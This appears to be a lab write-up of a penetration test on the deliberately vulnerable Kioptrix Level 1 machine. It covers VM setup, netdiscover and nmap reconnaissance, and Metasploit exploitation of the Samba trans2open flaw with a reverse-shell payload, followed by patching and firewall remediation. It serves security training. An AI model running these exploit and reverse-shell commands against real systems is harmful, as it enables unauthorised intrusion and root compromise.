## https://sploitus.com/exploit?id=0AC2D19F-E004-5080-BF49-2E6CDBAE56D7
# Kioptrix Level 1: Full-Spectrum Vulnerability Audit & Exploitation
## ๐๏ธ Professional Objective
The objective was to perform a structured penetration test on the Kioptrix Level 1 environment to achieve full 'root' compromise and document technical remediation strategies suitable for both Red and Blue team operations.
## ๐๏ธ Environment Reproduction (Hardware Lore)
Modern virtualization defaults often fail on legacy 2010 kernels. To successfully boot and network this machine, the following specific architectural configurations were required:
* **OS Subtype:** Linux / Red Hat (32-bit).
* **Storage Architecture:** Switched from SATA to **IDE Controller** to support the legacy .vmdk hard drive.
* **Network Protocol:** Configured as **PCI FAST-III** with a **Host-only adapter** to allow internal communication with the Kali Linux attack machine.
## โ๏ธ Offensive Analysis (Red Team Path)
The exploitation followed a manual enumeration-to-exploitation lifecycle:
### 1. Discovery & Reconnaissance
* **Netdiscover:** Used `netdiscover -r 192.168.184.4` to identify the target IP.
* **Nmap Scan:** Identified services including SSH (22), HTTP (80), RPC (111), and NetBIOS-SSN (139). Samba 2.2.1a was flagged as the primary entry point.
### 2. Exploitation (Samba trans2open)
* **Vulnerability:** CVE-2003-0201 (Heap Overflow).
* **MITRE ATT&CK Mapping:** - **Tactic:** Privilege Escalation (TA0004)
- **Technique:** Exploitation for Privilege Escalation (T1068)
* **Metasploit Protocol:**
- `use exploit/linux/samba/trans2open`
- `set RHOSTS 192.168.114.5`
- `set payload linux/x86/shell/reverse_tcp`
* **Result:** Successfully spawned a reverse shell. Command `whoami` returned `root`.
## ๐ก๏ธ Defensive Remediation (Blue Team Path)
To secure an enterprise environment, the following **Vulnerability Management (VM)** strategies are mandatory:
* **Patching Protocol:** **Update Samba** to the latest supported version (Samba 4.x). The vulnerability in the `call_trans2open` function is effectively patched in all modern versions.
* **Network Hardening:** Deploy host-based firewalls to restrict Ports 139 and 445 to trusted internal subnets only.
* **VM Role Strategy:** This remediation falls under standard business-hour **Vulnerability Management** cycles, ensuring infrastructure stability.
---
## ๐ Technical Evidence & Manual Logs
The following images document the live manual enumeration and terminal execution:
### Target Discovery & Architecture Notes

### Metasploit Command Logic & Payload Configuration

### Root Access Proof (Terminal Snapshot)
[Root Shell Evidence](kioptrix%20level%201.png)